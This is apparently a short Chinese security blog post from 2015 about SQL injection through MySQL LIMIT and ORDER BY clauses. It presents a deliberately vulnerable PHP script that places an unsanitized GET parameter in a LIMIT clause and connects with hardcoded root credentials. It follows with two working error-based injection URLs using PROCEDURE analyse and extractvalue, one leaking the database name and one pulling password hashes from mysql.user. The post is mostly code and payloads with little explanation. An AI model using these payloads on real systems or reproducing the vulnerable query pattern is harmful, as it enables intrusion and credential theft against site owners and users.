MENU

limit和order by的sql注入

January 26, 2015 • Security

0x1. 漏洞利用

漏洞php代码:

<?php
error_reporting(0);

$conn = mysql_connect('localhost', 'root', '123456') or die('database\'s username or password error');
mysql_select_db('test', $conn) OR die("连接数据库失败,未找到您填写的数据库");
$index = isset($_GET['index']) ? $_GET['index'] : 1;

// $sql = "SELECT * FROM admin WHERE uid < 10 ORDER BY $index LIMIT 10";
$sql = "SELECT * FROM admin WHERE uid < 10 ORDER BY uid LIMIT $index";
var_dump($sql);
$result = mysql_query($sql, $conn) or die(mysql_error());
?>

EXP:

http://localhost/test.php?index=1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,database())),1)%23

查询sql:

SELECT * FROM admin WHERE uid < 10 ORDER BY uid LIMIT 1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,database())),1)#, 10

1.png

只能显示一个字段的一条数据,否则报错

http://localhost/test.php?index=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select password from mysql.user limit 0,1))),1)%23

查询sql:

SELECT * FROM admin WHERE uid < 10 ORDER BY uid LIMIT 1 procedure analyse(extractvalue(rand(),concat(0x3a,(select password from mysql.user limit 0,1))),1)#

2.jpg

Archives QR Code
QR Code for this page
Tipping QR Code